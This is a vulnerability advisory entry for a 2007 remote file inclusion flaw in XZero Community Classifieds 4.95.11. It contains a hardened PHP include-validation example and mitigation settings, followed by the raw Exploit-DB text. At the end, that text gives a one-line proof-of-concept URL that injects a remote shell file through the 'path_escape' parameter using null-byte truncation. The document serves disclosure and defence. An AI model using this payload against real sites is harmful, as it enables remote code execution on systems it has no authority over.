Vendor: XZero Community Classifieds
Submitted by: Kw3rLn
CVSS: 7.5 (HIGH)
CWE class: Remote File Inclusion
Product Name: XZero Community Classifieds
Affected Version From: 4.95.11 and earlier
Affected Version To: 4.95.11
Patch Exists: NO
Year: 2007

XZero Community Classifieds <= v4.95.11 Remote File Inclusion

This vulnerability allows an attacker to include remote files in XZero Community Classifieds version 4.95.11 and earlier. In config.inc.php the value of the 'path_escape' parameter is used, without any validation, as the directory prefix of a require_once() call; by supplying a value of their choosing, an attacker can make the application include an arbitrary file from a remote server. This can lead to remote code execution or other malicious activity.

Mitigation:

Update to a version of XZero Community Classifieds that is not affected by this vulnerability. Remove any unnecessary file inclusion functionality from the application.
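Since the entry records no vendor patch, the following is an added example (not XZero's code) of how the include at line 303 of config.inc.php could be hardened: the directory prefix is fixed to the application's own directory instead of being taken from a request variable, and the file name is validated against null bytes, stream wrappers and path traversal before it reaches require_once(). The constant XZ_BASE_DIR and the function validate_include_path() are names introduced for this example.

```php
<?php
declare(strict_types=1);

// Added example, not the project's own code: hardened replacement for
//   require_once("{$path_escape}ipblock.inc.php");
// The prefix is never read from the request; it is pinned to this script's
// directory, and every include path is checked before use.
// XZ_BASE_DIR and validate_include_path() are assumed names for this example.

const XZ_BASE_DIR = __DIR__;

/**
 * Validate that $file is a bare filename that resolves to an existing file
 * directly inside $baseDir. Returns the canonical absolute path, or throws.
 */
function validate_include_path(string $baseDir, string $file): string
{
    // Embedded null bytes: PHP before 5.3.4 truncated paths at the first NUL,
    // which is what the published PoC relies on to drop the "ipblock.inc.php"
    // suffix. Reject them explicitly rather than trusting the runtime version.
    if (strpos($file, "\0") !== false) {
        throw new RuntimeException('include path contains a null byte');
    }

    // Stream wrappers (http://, ftp://, php://, data:) are never legitimate here,
    // regardless of the allow_url_include setting.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $file) === 1) {
        throw new RuntimeException('wrapper or remote include paths are not permitted');
    }

    // Only bare filenames are accepted: no directory separators, no traversal.
    if ($file === '' || $file === '.' || $file === '..' || basename($file) !== $file) {
        throw new RuntimeException('include path must be a bare filename');
    }

    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $file);
    if ($base === false || $full === false) {
        throw new RuntimeException('include file does not exist');
    }

    // Belt and braces: the resolved file must still sit directly under the base dir.
    if (dirname($full) !== $base) {
        throw new RuntimeException('include path escapes the application directory');
    }

    return $full;
}

// Equivalent of line 303 of config.inc.php, with the prefix no longer
// attacker-controlled. Kept at file scope (not wrapped in a function) so that
// any variables ipblock.inc.php defines land in the global scope as before.
require_once validate_include_path(XZ_BASE_DIR, 'ipblock.inc.php');
```

Two deployment settings complement the code change: register_globals = Off (the setting that lets a request parameter populate $path_escape in the first place; it was removed entirely in PHP 5.4) and allow_url_include = Off, which blocks remote URLs in include/require even if an unchecked path does slip through. Running PHP 5.3.4 or later also closes the null-byte truncation the proof of concept depends on, but the explicit check above does not rely on that.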

Exploit-DB raw data:

# XZero Community Classifieds  <= v4.95.11 Remote File Inclusion
# linK : http://www.xzeroscripts.com
# download: http://rapidshare.com/files/66809648/XZCl4.95.11.rar
#
# (c)od3d and f0unded by Kw3rLn from Romanian Security Team a.K.A http://rstzone.org
#
# we have in config.inc.php:
#    line303:    require_once("{$path_escape}ipblock.inc.php");
#
# link: http://site.com/config.inc.php?path_escape=shell.txt%00
#
# meri crismas...hohoho
# greetz to all RST [rstzone.org] MEMBERZ !

# milw0rm.com [2007-12-26]